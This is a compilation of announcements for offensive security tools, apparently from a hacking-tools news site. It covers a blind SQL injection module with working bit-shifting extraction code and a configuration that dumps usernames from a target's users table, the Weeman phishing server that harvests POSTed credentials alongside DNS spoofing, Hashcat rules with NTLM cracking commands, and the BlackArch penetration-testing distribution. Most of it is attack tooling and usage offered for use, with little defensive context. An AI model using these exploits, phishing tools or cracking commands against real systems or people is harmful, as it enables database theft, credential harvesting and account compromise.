cd whitewidow
bundle install
This should install all the needed gems and allow you to run the program without trouble.

Misc
Current Version 1.0.6.1
Future updates:
  • Custom user agent
  • Webcrawler to search specified site for vulnerabilities
  • Will be moving all .rb extension files into lib/core directory
  • Advanced searching, meaning multiple pages of Google, along with multiple parameter checking.
  • Ability to detect database type.
  • Using multiple search engines, such as DuckDuckGo, Google, Bing, and Yahoo. This will prevent one search engine from treating the repeated searches as a threat and will give further anonymity to the program. I will also be adding IP anonymity with a built-in proxy feature. This feature will ALWAYS be on, and will have a flag (--no-proxy) so that you can decide not to use a proxy.


Blind-Sql-Bitshifting - Blind SQL Injection via Bitshifting


This is a module that performs blind SQL injection by using the bitshifting method to calculate characters instead of guessing them. It requires 7 or 8 requests per character, depending on the configuration.
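The trick in miniature: instead of guessing characters, ask the database for one bit of the target character per request by right-shifting its ASCII value. A self-contained sketch of the idea, not this module's internals; oracle() stands for one boolean injection request (does the truth string appear on the page or not):

def recover_char(oracle, position):
    # walk the bits of ASCII(SUBSTRING(col, position, 1)) from high to low;
    # each oracle call injects a condition like
    #   (ASCII(SUBSTRING(username, position, 1)) >> bit) = guess
    value = 0
    for bit in range(7, -1, -1):   # start at 6 when the high bit is assumed 0
        guess = (value << 1) | 1
        if oracle(position, bit, guess):
            value = guess          # the next bit was 1
        else:
            value = value << 1     # the next bit was 0
    return chr(value)

The 8 requests per character fall out of the loop above; assuming plain ASCII lets you skip the highest bit and start from bit 6, which is the 7-request case.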

Usage
import blind_sql_bitshifting as x

# Edit this dictionary to configure attack vectors
x.options

Example configuration:
# Vulnerable link
x.options["target"] = "http://www.example.com/index.php?id=1"

# Specify cookie (optional)
x.options["cookies"] = ""

# Specify a condition for a specific row, e.g. 'uid=1' for admin (optional)
x.options["row_condition"] = ""

# Boolean option for following redirections
x.options["follow_redirections"] = 0

# Specify user-agent
x.options["user_agent"] = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

# Specify table to dump
x.options["table_name"] = "users"

# Specify columns to dump
x.options["columns"] = "id, username"

# String to check for on page after successful statement
x.options["truth_string"] = "<p id='success'>true</p>"

# See below
x.options["assume_only_ascii"] = 1
The assume_only_ascii option makes the module assume that the characters it's dumping are all ASCII. Since the ASCII charset only goes up to 127, we can assume the highest bit is 0 and not worry about calculating it. That's a 12.5% reduction in requests. Testing locally, this yielded an average speed increase of 15%. Of course this can cause issues when dumping characters that are outside of the ASCII range. By default, it's set to 0.
Once configured:
    x.exploit()   

This returns a 2-dimensional array, with each sub-array containing a single row, the first being the column headers.
Example output:
    [['id', 'username'], ['1', 'eclipse'], ['2', 'dotcppfile'], ['3', 'Acey'], ['4', 'Wardy'], ['5', 'idek']]   

Optionally, your scripts can then harness the tabulate module to output the data:
from tabulate import tabulate

data = x.exploit()

print tabulate(data,
               headers='firstrow',  # use the first row as the column headers
               tablefmt='psql')     # psql-style output; other formats can be used
This would output:
+------+------------+
| id | username |
|------+------------|
| 1 | eclipse |
| 2 | dotcppfile |
| 3 | Acey |
| 4 | Wardy |
| 5 | idek |
+------+------------+


Weeman v1.7 - HTTP Server for Phishing


An HTTP server (and framework) for phishing, written in Python. Usually you will want to run Weeman together with a DNS spoofing attack (see dsniff, ettercap).

Press
  • 1.7 is out (25-03-2016)
  • Added profiles
  • Weeman framework 0.1 is out!
  • Added command line options.
  • BeautifulSoup dependency removed.

Weeman will do the following steps:
  1. Create a fake html page.
  2. Wait for clients.
  3. Grab the data (POST).
  4. Try to log the client in to the original page.

The framework
You can use weeman with modules (see the examples in modules/); just run the command framework to access the framework.

Write a module for the framework
If you want to write a module, please read the examples in modules/. Soon I will write docs for the API.

Profiles
You can load profiles in weeman, for example a profile for a mobile site and a profile for a desktop site.
./weeman.py -p mobile.localhost.profile

Requirements
  • Python <= 2.7.

Platforms
  • Linux (any)
  • Mac (Tested)
  • Windows (Not supported)

Contributing
Contributions are very welcome!
  1. fork the repository
  2. clone the repo (git clone git@github.com :USERNAME/weeman.git)
  3. make your changes
  4. Add yourself in contributors.txt
  5. push the repository
  6. make a pull request
Thank you - and happy contributing!


Hob0Rules - Password cracking rules for Hashcat based on statistics and industry patterns


Password cracking rules for Hashcat based on statistics and industry patterns. A series of blog posts on passwords explains the statistical significance of these rulesets.

Useful wordlists to utilize with these rules have been included in the wordlists directory
Uncompress these with the following command
gunzip rockyou.txt.gz

hob064
This ruleset contains 64 of the most frequent password patterns used to crack passwords. Need a hash cracked quickly to move on to more testing? Use this list.
hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/rockyou.txt -r hob064.rule -o cracked.txt

d3adhob0
This ruleset is much more extensive and utilizes many common password structure ideas seen across every industry. Looking to spend several hours to crack many more hashes? Use this list.
hashcat -a 0 -m 1000 <NTLMHASHES> wordlists/english.txt -r d3adhob0.rule -o cracked.txt
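For reference, each line of a .rule file is a chain of transformations that hashcat applies to every wordlist candidate. A few illustrative rules in hashcat's rule syntax (examples of the syntax, not lines quoted from these rulesets):

# ':' passes the word through unchanged      password -> password
:
# 'c' capitalizes the first letter           password -> Password
c
# '$X' appends the character X               password -> Password1!
c $1 $!
# 'sXY' substitutes X with Y (a->@, s->$)    password -> p@$$word
sa@ ss$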


BlackArch Linux v2016.04.28 - Penetration Testing Distribution



BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1410 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

ChangeLog:

  • added new (improved) BlackArch Linux installer
  • include linux kernel 4.5.1
  • fixed an EFI boot issue
  • fixed the well-known i686 boot issue
  • added more than 80 new tools
  • updated all blackarch tools
  • updated all system packages
  • updated menu entries for window managers (awesome, fluxbox, openbox)

Installing on top of ArchLinux

BlackArch Linux is compatible with existing/normal Arch installations. It acts as an unofficial user repository. Below you will find instructions on how to install BlackArch in this manner.
# Run https://blackarch.org/strap.sh as root and follow the instructions.
$ curl -O https://blackarch.org/strap.sh

# The SHA1 sum should match: 86eb4efb68918dbfdd1e22862a48fda20a8145ff
$ sha1sum strap.sh

# Set execute bit
$ chmod +x strap.sh

# Run strap.sh
$ sudo ./strap.sh

You may now install tools from the blackarch repository.
# To list all of the available tools, run
$ sudo pacman -Sgg | grep blackarch | cut -d' ' -f2 | sort -u

# To install all of the tools, run
$ sudo pacman -S blackarch

# To install a category of tools, run
$ sudo pacman -S blackarch-<category>

# To see the blackarch categories, run
$ sudo pacman -Sg | grep blackarch

Alternatively, you can build the blackarch packages from source. You can find the PKGBUILDs on GitHub. To build the entire repo, you can use the blackman tool.
# First, you must install blackman. If the BlackArch package
# repository is set up on your machine, you can install blackman like:
$ sudo pacman -S blackman

# Download, compile and install package:
$ sudo blackman -i <package>

# Download, compile and install whole category
$ sudo blackman -g <group>

# Download, compile and install all BlackArch tools
$ sudo blackman -a

# To list blackarch categories
$ blackman -l

# To list category tools
$ blackman -p <category>                                 


Installing from ISO

You can install BlackArch Linux (packages AND environment) using the Live or Netinstall medium.
# Install blackarch-install-scripts package
$ sudo pacman -S blackarch-install-scripts

# Now, you can run and follow the instructions
$ sudo blackarch-install

